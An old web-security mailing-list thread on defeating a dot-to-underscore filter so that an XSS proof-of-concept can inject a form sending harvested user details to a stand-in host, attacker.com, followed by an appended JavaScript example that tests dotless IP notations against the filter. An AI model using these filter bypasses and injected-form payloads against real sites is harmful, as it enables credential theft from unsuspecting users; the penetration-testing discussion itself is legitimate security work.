RE: Fullstop Substitution in XSS
From: "Michael Silk" <michaels () phg com au>
Date: Tue, 1 Jun 2004 10:07:49 +1000
In the old days, an ip (127.0.0.1) used to be able to be replaced
for the expanded notation (127 * 2^24 + 0^16 + 0^8 + 1), perhaps
check if that still works (although I seem to remember it doesn't).
Other than that (and possible dns infiltration) consider sites that,
upon invalid domain (http://yahoo?test () hello) redirect to somewhere
else ... even some search sites ... i.e. perhaps you could execute a
search which your malicious site (attacker.com) would make note of.
Or ... you say you tried hex encoding ... i.e. this ?
if result is:
<form target="INPUT GOES HERE">
INPUT GOES HERE could be ...
If the % gets translated at the time of sending to the site, hex-encode
that because the above is *exactly* what should appear in the source of
the form tag, not the decoded result.
From: Calum Power [mailto:enune () fribble net]
Sent: Saturday, 29 May 2004 2:49 PM
To: webappsec () securityfocus com
Subject: Fullstop Substitution in XSS
As a part of a recent Pen-Test, I came across an XSS vulnerability. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.
My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">
Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).
Any help would be appreciated.
enune () fribble net
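The dotless-IP idea from the reply above, worked through as an added example (this is not code from either poster). It simulates the filter Calum describes, assuming the script URL-decodes the parameter before replacing "." with "_" (which is why %2E did not help), then converts a dotted-quad address into the 32-bit "dword" and hex notations and checks, with Node's WHATWG URL parser, that a browser would still resolve them to the intended host. The address 127.0.0.1 and the path /h are constructed test values; on an engagement you would use the IP of your own collector. Note that the form's submission URL lives in the action attribute (target only names a browsing context), and that an IP-only URL gives you no hostname, so no name-based virtual hosting or TLS SNI on the receiving side.

```javascript
// Added example, not from the original thread. Runs on Node (uses the global URL class).

// Simulates the filter described in the thread (assumption: the PHP script
// URL-decodes the value first, so "%2E" becomes "." before the replacement).
function dotFilter(input) {
  const decoded = decodeURIComponent(input);
  return decoded.replace(/\./g, "_");
}

// Alternative IPv4 notations that browsers accept and that contain no ".".
// dword = a*2^24 + b*2^16 + c*2^8 + d, as in the reply above.
function ipv4Forms(dotted) {
  const octets = dotted.split(".").map(Number);
  if (octets.length !== 4 ||
      octets.some(o => !Number.isInteger(o) || o < 0 || o > 255)) {
    throw new Error("not a dotted-quad IPv4 address: " + dotted);
  }
  const dword = octets[0] * 2 ** 24 + octets[1] * 2 ** 16 + octets[2] * 2 ** 8 + octets[3];
  return {
    decimal: String(dword),             // e.g. 2130706433
    hex: "0x" + dword.toString(16),     // e.g. 0x7f000001
  };
}

// Hostname a WHATWG URL parser (Node, modern browsers) resolves a URL to.
function hostnameOf(url) {
  return new URL(url).hostname;
}

// Build a candidate submission URL, run it through the filter, and report
// whether it survived unchanged and still points at the intended address.
function bypassCheck(ip, path, form) {
  const url = "http://" + ipv4Forms(ip)[form] + path;
  const filtered = dotFilter(url);
  let resolved = null;
  try { resolved = hostnameOf(filtered); } catch (e) { resolved = null; }
  return {
    url,
    filtered,
    survived: filtered === url,
    resolved,
    reachesTarget: resolved === ip,
  };
}

// Constructed demonstration values.
const naive = dotFilter("http://attacker.com/h");          // "http://attacker_com/h"
const encoded = dotFilter("http://attacker%2Ecom/h");      // also "http://attacker_com/h"
const dec = bypassCheck("127.0.0.1", "/h", "decimal");     // survives, resolves to 127.0.0.1
const hex = bypassCheck("127.0.0.1", "/h", "hex");         // survives, resolves to 127.0.0.1

if (typeof require !== "undefined" && require.main === module) {
  console.log({ naive, encoded, dec, hex });
}
```

The decoded-then-filtered simulation reproduces Calum's observation exactly: the percent-encoded dot is turned back into "." and then into "_", so encoding buys nothing. The numeric forms never contain a dot, so the filter leaves them alone and the parser still yields 127.0.0.1.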